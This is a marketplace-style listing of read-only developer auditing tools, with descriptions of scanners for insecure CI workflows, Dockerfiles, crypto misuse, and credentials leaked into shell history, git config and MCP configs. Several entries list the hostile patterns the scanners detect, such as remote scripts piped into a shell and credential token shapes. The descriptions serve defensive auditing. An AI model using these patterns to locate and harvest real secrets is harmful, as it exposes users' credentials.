mikiri-rate-limiter-guard: Scans authorization tokens, inspects protocol payloads, checks CORS policies, and mitigates OWASP Top 10 vulnerabilities.SESSIONS6 STEPSREAD ONLY3 ↓267Malenia Agent OrchestratorDomain Analysis & Developer Utility for malenia-agent-orchestrator: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY3 ↓268Github Pr Sync ProberDomain Analysis & Developer Utility for github-pr-sync-prober: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY3 ↓269Github Actions Ci WriterDevOps & Container Optimization Engine for github-actions-ci-writer: Scans build artifacts, optimizes Dockerfile multi-stage layers, and automates CI/CD deployments.SESSIONS6 STEPSREAD ONLY3 ↓270Expedition Cache InvalidatorDomain Analysis & Developer Utility for expedition-cache-invalidator: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY3 ↓271Env Example ScaffolderDevOps & Container Optimization Engine for env-example-scaffolder: Scans build artifacts, optimizes Dockerfile multi-stage layers, and automates CI/CD deployments.SESSIONS6 STEPSREAD ONLY3 ↓272Dragonrot Log DiagnosticianDevOps & Container Optimization Engine for dragonrot-log-diagnostician: Scans build artifacts, optimizes Dockerfile multi-stage layers, and automates CI/CD deployments.SESSIONS6 STEPSREAD ONLY3 ↓273Dockerfile Alpine OptimizerDevOps & Container Optimization Engine for dockerfile-alpine-optimizer: Scans build artifacts, optimizes Dockerfile multi-stage layers, and automates CI/CD deployments.SESSIONS6 STEPSREAD ONLY3 ↓274Bundle Diet GuruDomain Analysis & Developer Utility for bundle-diet-guru: Inspects code patterns, computes metrics, and automates routine development workflows.SESSIONS6 STEPSREAD ONLY3 ↓275Auth ScanAuth security audit for Express/Node.js backends. Scans source for auth files, audits bcrypt hashing (salt rounds, compare usage, plaintext), JWT lifecycle (sign, verify, expiry, env secret, bearer extraction), middleware coverage, and refresh tokens. Returns a deterministic verdict (PASS / PASS_WITH_WARNINGS / FAIL) with a checklist, prioritized recommendations, and evidence. Read-only, no credentials. ROTE5 STEPSREAD ONLY3 ↓276Token AuditAI Prompt & Token Budget Auditor. Scans a directory for prompt files, estimates token counts, flags bloat (>4k tokens), and projects monthly API costs across models (GPT-4o, Claude 3.5 Sonnet, etc.). Read-only, no credentials, no auth. ROTE4 STEPSREAD ONLY3 ↓277RetypedFinds the commands you type most often in your terminal - the long ones you retype again and again, every day - and tells you which of them are actually worth turning into a short alias. If you have ever thought I should really make a shortcut for this, this is the play that decides which shortcuts are actually worth making and writes the alias lines for you. Your shell has been keeping a diary of every command you type and nobody ever reads it. This reads it and tells you which commands are actually worth a shortcut, ranked by the keystrokes an alias would save rather than by how often you type them. That distinction is the whole play. Frequency is the wrong metric and every tool that suggests aliases from history gets it wrong - on a real 1000-entry history the naive version says to alias a 10-character command typed 77 times, which saves nothing because it is already short, while the real answer is a 62-character command typed 30 times worth 1740 keystrokes. Three more rules it enforces. It never proposes a name that shadows something real - every candidate is checked against your PATH, your shell builtins and the aliases already defined in your rc files, and when a name is taken or unusable it derives a different one instead of appending a digit, because piss2 and cd2 are not fixes. It reports commands you edited and immediately re-ran as exactly that, adjacency and not failure, because shell history records no exit codes and usually no timestamps, so calling it a failed command would be a guess dressed as a fact. And it redacts credential-shaped text before printing and never offers such a command as an alias however often you typed it, including percent-encoded forms - a phone number written %2B371 in a curl body is still a phone number, and checking only the raw text missed 17 of 18 on the machine this was built on. Reads zsh, bash and fish; a shell you do not use is reported as not used rather than as empty. Zero credentials, reads only, writes only its own report. For hunting the secrets themselves rather than avoiding them, dotisacat/shell-history-leak-scan is the play that does that.ROTE4 STEPSREAD ONLY3 ↓278Test Gap MapMaps the files a branch changed onto the CI jobs that would actually select them, and finds the code that changed but never reaches a test. Resolves GitHub path filters properly: a workflow with no paths filter matches every file and therefore covers everything, ** crosses directory boundaries while * does not, and paths-ignore subtracts. Test-running jobs are identified from real run commands and action names, never from test-shaped words in comments, because a false positive there hides the gap it should report. Read-only, no CI credentials, no API calls.ROTE4 STEPSREAD ONLY3 ↓279Dockerfile AuditAudits Dockerfiles with multi-stage builds actually understood, because only the final stage ships. A credential in the shipped stage is recoverable from the published image and is reported as critical, while the same line in a discarded builder stage is reported separately and lower. A missing USER is not flagged when the base image is a nonroot variant that already drops privileges. Also finds unpinned base images, remote ADD without a checksum, remote scripts piped into a shell, and a whole-context COPY with no .dockerignore, which quietly bakes .git history and .env files into the image. Read-only, never builds or pulls anything.ROTE3 STEPSREAD ONLY3 ↓280License GuardAnswers the question that matters before you open-source or ship a product: is a reciprocal licence hiding in your dependency tree? Reads installed package manifests offline, classifies every licence by SPDX expression (respecting that OR can be satisfied by its permissive branch while AND cannot), and reports strong copyleft, non-free and unrecognised licences against your own project's licence. No registry calls, no API key, no rate limit, no credentials.ROTE3 STEPSREAD ONLY3 ↓281Ci Supply ChainAudits GitHub Actions workflows for the exposures that hand your repository secrets to someone else: pull_request_target checking out the pull request head, attacker-controlled context interpolated straight into a shell command, actions pinned to a movable branch or tag instead of a commit SHA, remote scripts piped into a shell, and workflows with no permissions block. Two rules deliberately require a combination, because pull_request_target on its own is ordinary and github.sha is not attacker-controlled, and flagging those teaches you to ignore the tool. Read-only, no tokens, no API calls.ROTE3 STEPSREAD ONLY3 ↓282Repo Dependency GraphMap internal module dependencies, detect circular import cycles (Tarjan SCC), and identify tightly-coupled god files across Python, JS/TS, and Go.ROTE1 STEPSREAD ONLY3 ↓283Docs Change MonitorWrites snapshots + a run log to ~/.rote/docs-change-monitor/. Reports what changed in public docs and changelogs since the last run.ROTE2 STEPSREAD ONLY3 ↓284Timezone HazardsAnswers one question about a codebase: where does it handle time in a way that will be wrong for someone, somewhere? Timezone bugs do not fail in CI - they fail in October when the clocks change, or for one user in Auckland, or for the one report that lands on the wrong day. Finds a NAIVE datetime compared with or subtracted from an AWARE one, which raises TypeError in Python and is therefore a latent crash rather than a style issue; `datetime.utcnow()` and `datetime.utcfromtimestamp()`, which return a naive datetime that merely happens to hold UTC and are deprecated in 3.12; a timestamp column with no timezone, in SQL DDL (`TIMESTAMP`, `timestamp without time zone`, MySQL `DATETIME`), SQLAlchemy (`DateTime` without `timezone=True`), Prisma (a bare `DateTime`) and Drizzle or knex (`timestamp()` without `withTimezone`); date arithmetic that assumes a fixed day length - `timedelta(days=1)`, 86400, `Add(24 * time.Hour)`, `+ 86400000` - where a calendar day is meant; a calendar date derived from a timestamp with no zone stated, which is how a report lands on the wrong day, covering `date.today()`, `.date()` on a local value, a date-only `strftime`, `.toDateString()`, `.toLocaleDateString()` with no timeZone option, a date assembled from local getters, `date_trunc('day', ...)` and `col::date`; `new Date("2026-01-15")`, which parses as UTC midnight, against `new Date("2026-01-15T00:00")`, which parses as local, two strings that can differ by a day; a cron schedule pinned to an hour with no timezone declared anywhere near it; and Go `time.Parse` with no zone token in the layout, which silently returns UTC, plus `time.Now().Format` with no location. Grades by who gets hurt: a naive/aware mix is critical because it is a crash, date bucketing in server-local time is high because reports are silently wrong, a tz-less column is high because the data is already ambiguous once written, and fixed-day arithmetic and a zoneless schedule are medium. Comments and string bodies are blanked by a language-aware lexer, so a comment that discusses `datetime.utcnow()` is prose and never a finding, while a short simple string body - a format string, a date literal, an IANA zone name, a cron expression - survives into a second buffer, because `%Y-%m-%d` and `%Y-%m-%d %H:%M %Z` are the same call and opposite verdicts. Four families are deliberately EXCLUDED, counted and named rather than reported: duration or elapsed measurement, where zones are irrelevant by construction (`time.monotonic()`, `perf_counter`, `time.Since`, `performance.now()`); a UNIX epoch integer, unambiguous by definition; a value explicitly formatted or converted in a stated zone (`%Z`, `toLocaleString` with a timeZone, `.UTC().Format`, `AT TIME ZONE`); and a naive datetime used consistently in a file with nothing aware anywhere in it, which is a closed single-zone system whose only exposure is an undocumented frame. Ends with what it cannot tell you, so a short findings list is never mistaken for a clean bill of health. Read-only, offline, no credentials.ROTE2 STEPSREAD ONLY3 ↓285Shutdown SafetyAnswers one question about a codebase: will this service lose work when the orchestrator stops it? Every rolling deploy sends SIGTERM, and a process that ignores it keeps running until SIGKILL arrives, so whatever was in flight at that moment is gone - the half-written HTTP responses, the queue message that was already deleted, the row that was half inserted - and it looks completely healthy in every test. Finds a long-running server or worker with no signal handler at all, which is the base case and the most common; a handler that calls os._exit, sys.exit, process.exit or os.Exit instead of draining, which is worse than none because it makes the problem look solved; an HTTP server started with no shutdown path anywhere in its file or package, including http.ListenAndServe and Flask app.run which expose no shutdown API at all; a consumer loop over a queue, Kafka, SQS or Redis BLPOP whose only exit is a kill; a Dockerfile whose CMD or ENTRYPOINT is shell form, so PID 1 is sh and the signal never reaches the process at all; and a terminationGracePeriodSeconds shorter than the container's own preStop sleep or its code's own drain deadline. Work acknowledged before it is done - an ack, delete or commit-offset ahead of the handler - is reported separately, because that is a correctness bug rather than a shutdown bug. The hard part is telling a long-running service from a script, since exiting immediately on SIGTERM is exactly right for a CLI and draining is meaningless there, so every file reports the positive evidence that it is a service and the negative evidence that it is a script, and every exclusion is named: a one-shot script, a test harness, a supervisor documented by STOPSIGNAL to send SIGINT, and a server whose shutdown is owned by a framework, with the framework named and its mechanism stated. Comments and string bodies are blanked by a language-aware lexer, so a commented-out loop is prose. Covers Python, Go and JavaScript/TypeScript, Dockerfiles and Kubernetes workloads. Read-only, offline, no credentials.ROTE2 STEPSREAD ONLY3 ↓286Query In LoopAnswers one question about a codebase: where does it issue a query, or any other call that leaves the process, once per item of a collection it already has. The N+1 query is the most common performance bug in application code and it never shows up on a dev machine with ten rows, so it survives review and arrives in production as a page that takes nine seconds. Four tiers are separated because they are four different conversations: a database query inside a for/while/forEach/comprehension body (cursor.execute, session.query, db.Query, db.QueryRow, prisma.x.findUnique, knex, .findOne, a driver .execute, a repository .findById); an HTTP call or an obviously remote SDK method in the same place (requests, httpx, fetch, axios, http.Get, an LLM or AWS or vendor client); an ORM relationship lazy load, which is the version people cannot see, where iterating a query result and touching a related object issues a SELECT per row unless the query eager-loaded it; and an await inside a sequential for over an array in JS/TS, reported separately because that one is latency rather than query count and Promise.all fixes it without changing how many calls are made. Severity is blast radius, because the same three lines are a page-load catastrophe in a request handler and a slow nightly job in a worker: critical for a route handler, a route-registered callback, an exported API function or a function called from a handler in the same file; high for a batch job, a worker, a poller, an ingestion pipeline or a migration; medium for a one-off script or a CLI; and a fourth bucket, undetermined, for code with no evidence either way, because a guessed severity is worse than an absent one. Every finding names the real line of the call AND the line of the enclosing loop, so a reader can judge it without trusting the tool. One indirection is followed: a helper defined in the same file that was seen making a query or a remote call is reported when a loop calls it, marked as one hop rather than a match, because well-factored code routes every request through a private wrapper and a scan that only reads call sites returns nothing at all on such a repository. Nine correct patterns are recognised, counted, named in the output and never reported, and the first matters more than all the others put together: a chunking or pagination loop, because iterating pages or chunks of ids IS the fix for N+1 and flagging it would be exactly backwards; a call that passes a collection to an IN (...) / = ANY / whereIn / __in predicate; a query hoisted above the loop whose result is read inside it; a loop over a literal list of five or fewer elements; a retry or backoff loop around a single call; an unbounded supervisor or reconnect loop with a sleep or a select and no collection at all; a BEGIN, COMMIT or ROLLBACK, which is one transaction per item rather than one query per item; an ORM iteration whose query already eager-loads the relation; a JSX event handler rendered per row, which fires when someone clicks rather than once per item; and a parallel fan-out, whether Promise.all, asyncio.gather, a goroutine, or a bounded Promise.all worker pool, whose latency is parallel even though its call count is not. Exclusion is scoped to the innermost enclosing loop, so a per-item query nested inside a chunking loop is still reported. Comments and string bodies are blanked by a language-aware lexer, so a commented-out query stays a comment. Languages modelled: Python, JavaScript, TypeScript, Go, Java and Kotlin. Read-only, offline, no credentials.ROTE2 STEPSREAD ONLY3 ↓287Py Lock DriftFinds where a Python project's declared dependencies and its lock file disagree, which is how "works on my machine" happens. Compares pyproject.toml, requirements files and Pipfile against uv.lock, poetry.lock, Pipfile.lock or pip-compile output and reports five things: packages declared but absent from the lock, packages the lock still carries as direct dependencies that nothing declares any more, declared constraints the locked version violates, a lock whose own record of the manifest no longer matches it, and direct dependencies with no version specifier at all. Only direct dependencies are compared in the locked-but-undeclared direction, because a lock legitimately holds the whole transitive closure; names fold under PEP 503 so Flask_Login and flask-login are one package. Offline, no index call, no API key, no credentials.ROTE2 STEPSREAD ONLY3 ↓288Iac ExposureAudits Terraform for the configurations that put a network or a data store on the public internet, or make a destroy unrecoverable. Block context is parsed rather than grepped, which matters more here than anywhere: cidr_blocks 0.0.0.0/0 inside an egress block is how nearly every workload reaches the internet, while the same line inside ingress is an open door, and a route table's default route is neither. Severity follows the port, so an open 443 on a load balancer is reported as normal while 22 or 5432 is critical. Both the classic ingress block and the modern aws_vpc_security_group_ingress_rule with cidr_ipv4 are understood. Read-only, never contacts a cloud provider, needs no credentials.ROTE2 STEPSREAD ONLY3 ↓289Crypto MisuseAnswers one question about a codebase: where does it use a cryptographic primitive in a way that does not provide what the primitive appears to provide. Cryptography fails silently - the code runs, the tests pass, and the security is gone - so this looks for the misuses that read as completely normal code. A non-cryptographic RNG feeding something security-bearing is the highest-value finding and is graded by what consumes the value: math/rand in Go, Math.random() in JavaScript, random rather than secrets in Python, rand() and std::mt19937 in C and C++, java.util.Random, mt_rand and uniqid in PHP, Kernel#rand in Ruby, and SmallRng or seed_from_u64 in Rust - while Rust thread_rng and OsRng are correctly recognised as CSPRNGs and never flagged. Also finds MD5, SHA-1, SHA-256 and SHA-512 standing in for a password KDF where the answer is bcrypt, scrypt, argon2 or PBKDF2; MD5 or SHA-1 where collision resistance is load-bearing, reported separately from MD5 as a cache key, an ETag, a shard index or a git object id, which is correct and is never flagged; AES in ECB mode; a hardcoded, all-zero or never-refilled IV or nonce, graded harder under GCM and CTR than under CBC because nonce reuse under an AEAD leaks the authentication subkey; key material and PEM private keys written into source; a secret, MAC or token compared with == instead of a constant-time compare; TLS certificate verification switched off; and a JWT decoded without verification or verified with the algorithm the token itself asked for. Severity is exploitability, never how alarming the primitive sounds: a predictable RNG behind a session token is critical, MD5 behind a cache key is not a finding at all, and a disabled TLS check in a test fixture or a localhost script is graded far lower than the same line in a production client, with the reachability this play concluded stated in the finding. Retry jitter, backoff, sample data, colours and shuffles are recognised as places a fast RNG belongs; a hash of a file, a path or a URL is not a password hash even when the surrounding function is named for one; and placeholders like your-api-key-here are not key material. Comments and string bodies are separated by a language-aware lexer, so a commented-out misuse stays a comment. Read-only, offline, no credentials.ROTE2 STEPSREAD ONLY3 ↓290Compose AuditAudits docker-compose files for what they expose to the host and for the settings that make a stack fragile. The whole value is a distinction a grep cannot make: ports "127.0.0.1:5432:5432" is correctly bound to loopback and is never reported, while "5432:5432" publishes the same database on every interface the host has and is reported as critical. Both the short string form and the long target/published/host_ip form are understood, along with the IPv6 bracket form and a variable host port. Also finds privileged: true, a mounted docker socket, host network/pid/ipc namespaces, secrets written as plain environment values, :latest and untagged images, missing restart and healthcheck, bind mounts of sensitive host paths, and env_file entries naming a file that is not there. Compose files are parsed, including anchors and merge keys, so a privilege that arrives through <<: *defaults is attributed to the service that inherits it. Read-only, contacts no daemon, needs no credentials.ROTE2 STEPSREAD ONLY3 ↓291Evidence Backed Launch VideoTurns a product URL into a rendered MP4 launch video where every frame traces back to the real site, and says so. It captures the page once (screenshots, visible copy, brand colours), builds the cut from that evidence, renders it, and prints a ledger naming the source of every frame. In evidence mode it will not write a word the site does not publish, and will not put the same words on screen twice: a beat with no backing of its own is omitted and reported, never filled with a plausible tagline and never padded by repeating copy an earlier frame already showed, which matters because a site whose title equals its first heading is the normal case rather than the exception. Illustrative mode allows generic placeholder copy and marks each one INVENTED in the same ledger. A launch video is the one artifact where invention is the norm and an invented claim is indistinguishable from a real one once it is on screen; this makes that difference checkable. Writes only inside the output directory you name, uploads nothing, and never touches the captured site.ROTE5 STEPSREAD ONLY3 ↓292Repo Hygiene DoctorDeterministic zero-credential repo and data hygiene auditor.ROTE1 STEPSREAD ONLY3 ↓293Ml Train Hygiene CheckCatches the silent bugs that make ML runs non-reproducible or leak test data, before you waste hours debugging a model that trains differently every time. Point it at any directory of Python (or a single file) and it scans for 6 of the most common silent-correctness mistakes a static check can prove: a scaler fitted before the train/test split does (data leak), training-mode inference missing model.eval()/torch.no_grad(), a random seed set after the model or the shuffle, CUDA without deterministic flags, and a metric computed on unsplit data. Each finding is graded likely vs possible and prints the fix hint plus the code snippet at the exact file:line -- so the next action is obvious. Offline, pure Python stdlib (ast + tokenize), no credentials, no browser, never executes your code (parses only, so it is safe on untrusted repos). Zero findings on clean scripts makes it a 2-second pre-commit / CI hygiene gate. Try: rote play run https://play.modiqo.ai/sonic-tools/ml-train-hygiene-check target=/abs/path/to/repoROTE1 STEPSREAD ONLY3 ↓294Python Ssl DoctorOne HTTPS request fails with CERTIFICATE_VERIFY_FAILED and silently breaks every tool built on that python -- the real-incident hook here: a single shadowed interpreter failing exactly that way once quietly broke four separate downstream tools before anyone thought to check which python each one was actually running. Five jobs, in order: finds EVERY python3 (and bare python) executable on THIS machine's PATH -- all hits, not just the one a bare `python3` would resolve to, since shadowing means the broken interpreter may be exactly the one a cron job or background tool runs, never the one a human happens to test by hand; fingerprints each install's SOURCE from its path and, when available, its own sys.prefix -- python.org framework build, homebrew, conda-anaconda, pyenv, uv-managed, system Command Line Tools, or unknown; runs exactly ONE bounded TLS handshake per discovered python against a fixed, well-known host (pypi.org:443 -- socket connect then an SSL wrap_socket() handshake, no HTTP request line, nothing sent or received beyond the handshake itself, run once per python and never more -- this is the play's only network activity, because that handshake outcome IS the diagnosis); for every python that fails, derives the EXACT fix for its own install source -- python.org: run its own Install Certificates.command; conda: conda install ca-certificates, and use that conda's python only inside its own envs; pyenv/homebrew: an openssl-linkage note plus a certifi check, both using this python's own measured values -- plus a universal fallback (pip install certifi; export SSL_CERT_FILE) shown for every broken python regardless of source; and reports, per python, its ssl module linkage (ssl.OPENSSL_VERSION), whether certifi is installed and where its bundle lives, and whether SSL_CERT_FILE / REQUESTS_CA_BUNDLE are set -- NAMES plus a set/unset flag plus whether the file each one points at exists, never the path value itself and never file contents. A timeout on any one python's handshake degrades only that python to an honest "unreachable -- network?, not necessarily a cert problem" verdict, kept deliberately separate from a real certificate failure; when every python fails identically, this play cross-notes that a network outage or DNS/firewall block would look exactly the same from here, since pypi.org's own availability is never independently confirmed beyond these per-python handshakes. Read-only, no credentials transmitted; TRUST BOUNDARY disclosed explicitly: this play executes EVERY matching python/python3/python3.N found anywhere on this user's own PATH -- not only the one a bare python3 would resolve to, since that breadth is the whole point of catching a shadowed interpreter -- with fixed -c scripts carrying no user input, twice per match (fingerprint, then handshake); each execution is gated by a fail-closed pre-exec trust check first (resolved target must be a regular file owned by root or this user, never world-writable, never writable by a group this user does not belong to, never sitting in a world-writable directory lacking the sticky bit), so a same-named file that is not actually this user's own trusted interpreter is reported as discovered but never run; needs only python3.ROTE2 STEPSREAD ONLY3 ↓295Git Credential ExposureThe three places git authentication leaks in cleartext, all covered in one sweep. Five jobs: scan_global reads ~/.git-credentials -- the file `credential.helper=store` writes, one URL per stored credential -- parsing every line as a URL and reducing every embedded user:token pair it finds to HOST, a token SHAPE (a recognized pattern -- sk-, ghp_, gho_, xox[bp]-, AKIA, an eyJ-led JWT -- else the generic "stored-credential" bucket), and a 4-character-plus-length preview -- NEVER the token itself, and never the username either, which can itself be a real email or personal identifier this play has no business repeating; the file's own permission bits are read via os.stat and flagged whenever group- or world-readable, since a credential store readable by anyone but its owner is its own finding regardless of what it contains. scan_global also resolves the EFFECTIVE `credential.helper` value at system and global scope, in that order, via `git config <scope> --get-all credential.helper` (never re-derived by hand, never assumed single-valued -- git treats this key as cumulative; an empty value is git's own reset marker, preserved and replayed rather than dropped, so `store` followed by a reset is correctly not flagged): only a coarse KIND is ever reported (store, cache, osxkeychain, ...), never the raw configured value, which can itself be an arbitrary shell command or path. helper=store is flagged with an advisory to switch to osxkeychain (macOS) or your platform's credential manager, and an unset helper on macOS gets a plain informational note, since macOS enables no automatic Keychain integration on its own. scan_repos, one bounded sweep of base_dir up to max_depth levels (pruning node_modules and the same conservative noise list this fleet's other git sweeps already established, never descending into a found repository's own .git internals), then for every discovered repo reads its EFFECTIVE credential.helper -- system, global, local, and worktree scope, in git's own cumulative order, one `--show-scope` call -- since a local-only read cannot see a `store` inherited from global/system, nor a local reset that neutralizes one; flagged repos report whether `store` came from an explicit local override or was merely inherited -- and reads `git remote -v`, parsing every remote URL (password percent-decoded before classification) for an embedded user:token or x-access-token:token credential the identical way the file scan parses stored-credential lines, de-duplicated across a remote's fetch and push lines, reduced to remote name, host, shape, and the same 4-char preview; every git call here is --no-optional-locks with a scrubbed environment (GIT_TERMINAL_PROMPT=0, LC_ALL=C, inherited GIT_DIR/GIT_WORK_TREE/GIT_INDEX_FILE stripped), one repo's failed git call degrades that repo alone to an unknown row, and git missing from PATH entirely is the one essential-capability failure that fails scan_repos closed, since no per-repo read means anything without it. The presentation joins both independent root steps into per-surface sections, a text-only advisory block per finding class (rotate first, then reconfigure the helper, then delete ~/.git-credentials -- nothing here is ever executed on your behalf), and a CHECKED/UNVERIFIED coverage ledger that never claims a clean bill unless something was actually scanned AND fully, undegraded -- an unreadable credentials file, a parse error, a failed helper check, an unknown repository, or a truncated walk all withhold both `ok` and the clean bill, never silently defaulting to zero, and discloses upfront that credentials already sitting in your OS keychain -- the SAFE place -- are exactly what this play does NOT scan. shell-history-leak-scan covers what you TYPED at a shell prompt; this play covers git's own three cleartext auth surfaces instead -- the file, the config, and the remote URL. Read-only, no credentials, no network; needs python3 and git.ROTE2 STEPSREAD ONLY3 ↓296Shell History Leak ScanA git-history scanner reads what got committed. It never reads what got TYPED: an export/curl/psql/python invocation carrying a raw credential at a shell prompt lands in ~/.zsh_history, ~/.bash_history, ~/.local/share/fish/fish_history, ~/.python_history, or ~/.psql_history instead -- files no commit-scanner ever opens. himanshu-jha's git-history-secret-scan covers commits; this covers the shell. Five jobs: locate_histories stats all five known files -- present or not, readable or not -- every one reported on by name, never silently skipped, and never opening or reading a single one; scan streams every located, readable file line by line -- a multi-gigabyte history is never loaded whole -- parsing zsh's EXTENDED_HISTORY `: <ts>:<elapsed>;cmd` framing and its backslash line-continuation so a multi-line paste reads as the one logical entry it was, plus fish's `- cmd: ...` block form, and never treating a `#`-led comment line (however common a typed "remember to rotate the api key" aside is) as a command; it classifies what it reads as secret-shaped -- export/declare/set (bash, zsh, and fish's `set -x` form alike) or a bare inline VAR=value prefix where the NAME looks secret-related (key, token, secret, password, credential, auth) AND the value is a literal, never a $VAR or backtick indirection (`export KEY=$FROM_ENV` is the deliberately SAFE case and is never flagged, only a real value sitting in the clear is); a `curl -H "Authorization: Bearer <token>"` header, quoted or not, and a bare Bearer token besides; a --password/--token (or lookalike) flag carrying a literal value, never a bare flag; and well-known token shapes -- sk-, ghp_, gho_, xox[bp]-, AKIA, an eyJ-led JWT -- matched anywhere in a line, never double-counted against a match a name or flag already explained; every finding is then reduced, everywhere including this play's own JSON, to file, line number, a short SHAPE label, the variable/flag name, and the first 4 characters plus total length of the matched value -- NEVER the full value, never the full line, which can hold an unrelated private command sharing a history entry with a real secret -- and max_findings caps how many are listed individually, the rest only ever a count; and the report closes with a text-only remediation note (rotate first, then how to scrub a line without a still-open second shell silently re-writing it back over your edit) plus a CHECKED/UNVERIFIED coverage ledger, never a claim of a clean bill unless at least one file was actually scanned. Nothing is ever executed on your behalf, and no history file is ever written, moved, or truncated by this play itself. Read-only, no credentials, no network; needs only python3.ROTE2 STEPSREAD ONLY3 ↓297Laptop Loss DrillOne question, answered with evidence: if this laptop died right now, what would you lose? Two readings joined into a verdict: your last backup (Time Machine consulted read-only via tmutil; unreachable or unconfigured states reported honestly, never papered over) and the work that exists NOWHERE but this disk -- unpushed commits counted against every remote-tracking ref, branches with no upstream at all, stashes, and dirty files, from a bounded sweep of the git repositories under base_dir. Loss claims are conservative: a commit reachable from any pushed ref is never counted as lost. This is loss exposure, not work triage -- it answers what is unrecoverable, not what needs attention. Every git read uses --no-optional-locks with a scrubbed environment; one unreadable repo degrades to a labeled unknown, never a crash. Zero loss renders a positive verdict: backed up and pushed means this laptop is replaceable. Read-only, no credentials, no network; needs only python3 and git.ROTE2 STEPSREAD ONLY3 ↓298Mcp Config Secrets Auditmcp-context-tax (already published, ours) MEASURES the token cost of what your MCP servers advertise; mcp-doctor (already published, ours) DIAGNOSES their health -- this completes the trilogy: mcp-config-secrets-audit reports SECRET POSTURE across the exact same discovered configs, never cost, never health, never a value. Three jobs, in order: (1) reads the same fixed, well-known set of harness-owned config files its siblings already read (Claude Code global + per-project mcpServers, Claude Desktop, Cursor, Codex config.toml mcp_servers tables -- incl. a narrow TOML fallback reader for interpreters without stdlib tomllib -- Windsurf; never a filesystem walk for a stray project .mcp.json) and classifies EVERY env var value each declared server carries by SHAPE, at the exact moment it is read off disk and before anything is packed into this play's own inter-step data or printed anywhere: a literal secret-shape (an OpenAI-style sk- key, a GitHub ghp_ token, an AWS AKIA access key id, a JWT, or a 40+ character high-entropy token) versus safe indirection ($VAR, ${VAR}, or empty) versus an unremarkable plain literal (a file path, a short flag value); every classified value is reduced to its var NAME, its shape, a 4-character preview, and its length -- the raw value itself never survives past that one read, never packed, never printed, in any representation this play produces, including its own JSON result; (2) reads each config file's own permission bits once, independent of whether its contents parsed, and calls out the single combination that matters most -- a file that is world- or group-readable AND holds at least one inline secret-shaped value -- as the top finding, distinct from a merely loose-permissioned file holding nothing and a locked-down file that happens to hold a secret; (3) reports counts per config file (one file per harness in this play's fixed set) and a short, text-only, NEVER EXECUTED advisory whenever at least one inline secret-shaped value was found: move it to your OS keychain or a local env manager and reference it by name -- MCP configs travel in backups and dotfile repos. Unlike either of its siblings, this play never spawns anything at all -- no handshake, no probe, no process beyond reading files and stat()ing them; deliberately simpler and safer than mcp-context-tax or mcp-doctor, because a secrets audit never needs to run the thing it is auditing. Disabled server blocks (enabled: false) are still audited, on purpose -- a secret sitting in a config block a harness currently ignores is still a secret sitting in cleartext on disk. Read-only, no credentials transmitted, no network calls, no server spawned; needs only python3.ROTE2 STEPSREAD ONLY3 ↓299Scam InvestigatorForensic scam and phishing investigation Play that evaluates domain age, DNS health, brand impersonation, and psychological urgency triggers.ROTE6 STEPSREAD ONLY3 ↓300RotwatchAudits agent skill files for stale CLI commands: flags that were renamed, subcommands that moved, plugins that carry their own commands, help surfaces that changed shape. Rotwatch resolves every command in a skills directory against the CLIs actually installed on YOUR machine — read-only, only --version and --help are executed, nothing is ever written. DETECT classifies every finding (CONFIRMED STALE / NEEDS OPERATOR REVIEW / UNVERIFIABLE) with file, line, and CLI-version evidence; DRAFT proposes a patch only when a replacement is provable from the same help text, so a rename never becomes a silent token swap; APPLY stays a gated, human queue. Run it after every CLI upgrade, or as a daily habit: skill files are frozen local snapshots that no reinstall refreshes correctly — even a freshly installed skill was written against the author's CLI versions, not yours. The installed binary is the only ground truth.ROTE5 STEPSREAD ONLY3 ↓301Flagship Play Gap MapperReads a local hackathon strategy, compares it with public Rote Plays, and recommends the highest-leverage differentiated Play to build first.ROTE1 STEPSREAD ONLY3 ↓302Github Multi Repo Stale PrsCombined summary of pull requests open longer than N days across every repository owned by a GitHub user/orgAPISESSIONSGITHUB3 STEPSREAD ONLY3 ↓303Math Formula CopilotSolves a fresh mathematics problem with formula selection, guarded calculations, units, and clear steps.ROTE1 STEPSREAD ONLY3 ↓304Review Staged ChangesWhat are you actually about to commit? Reads the diff you have staged and names the things you did not mean to ship: a merge conflict marker that survived, a leftover console.log or pdb.set_trace, an it.only that silently de-selected every sibling test in its file, a literal shaped like an AWS key or a Stripe token, a .env or .pem that wandered into the change set, a lockfile that moved without its manifest, and the TODO you just added. Nothing is a finding unless it sits on a line you ADDED, because a warning about code you did not touch is a warning you learn to mute, and that is how pre-commit checks die. Secret-shaped values are masked in the printed evidence so the report cannot itself become the leak, and they are labelled shaped like a credential rather than is a credential, because a regular expression cannot prove that and should not pretend to. It also measures the payload: file count, lines added and removed, which single file dominates the diff, and an honest reviewability bucket. With no arguments and no repository it reviews a bundled demo diff, so a stranger gets a real verdict from an empty directory instead of an error. Reads git and nothing else: no network call, no file written, nothing staged, nothing committed, no credential carried. Needs only git and python3.ROTE4 STEPSREAD ONLY3 ↓305Blank Page ForensicsA page can answer 200 and still render blank. This finds the reason. It reads the page once, inventories every file the HTML tells a browser to load - scripts, stylesheets, fonts, media, icons, and the url() references inside inline CSS - then requests each one in parallel and reports the ones a visitor never gets. It separates four failure modes a status-code check cannot: a file that 404s, a file served with a content type the browser will not use, an http:// asset the browser blocks on an https page, and a reference that is a path from the machine that built the site rather than a URL on the server, which returns no status code at all. It also asks the host for a path that cannot exist, because a host answering 200 with its app shell for any path is the reason a mistyped bundle path looks perfectly healthy; loads each internal route directly, the way a refresh does; compares the HTML a phone is served against the HTML a desktop is served; and reads the HTML cache policy against the build-hashed filenames it names, which is how a returning visitor ends up requesting bundles a deploy has already deleted. Five probes run as parallel root steps and the asset and route checks fan out; any probe that cannot complete becomes a labelled unknown instead of failing the play, because a partial check and a healthy page must not read the same. It does not execute JavaScript, so a runtime exception in code that loaded correctly is out of scope and the report says so. Read-only: it makes GET and HEAD requests to the address you give it and nothing else, carries no credentials, writes nothing, and needs only python3.ROTE9 STEPSREAD ONLY3 ↓306Repo Health CheckRuns a parallel health check on a repository to find failing workflows, open bugs, and stale PRs.APISESSIONSGITHUB5 STEPSREAD ONLY3 ↓307Repo Todo DebtScans a local source tree for tech-debt markers (TODO, FIXME, HACK by default), skips vendored and binary files, and reports total counts per marker plus the files carrying the most debt. Read-only, offline, stdlib-Python only; a missing root fails loudly instead of reporting a clean repo.ROTE1 STEPSREAD ONLY3 ↓308Website Launch CheckCheck a website's HTTP availability and page title.ROTE2 STEPSREAD ONLY3 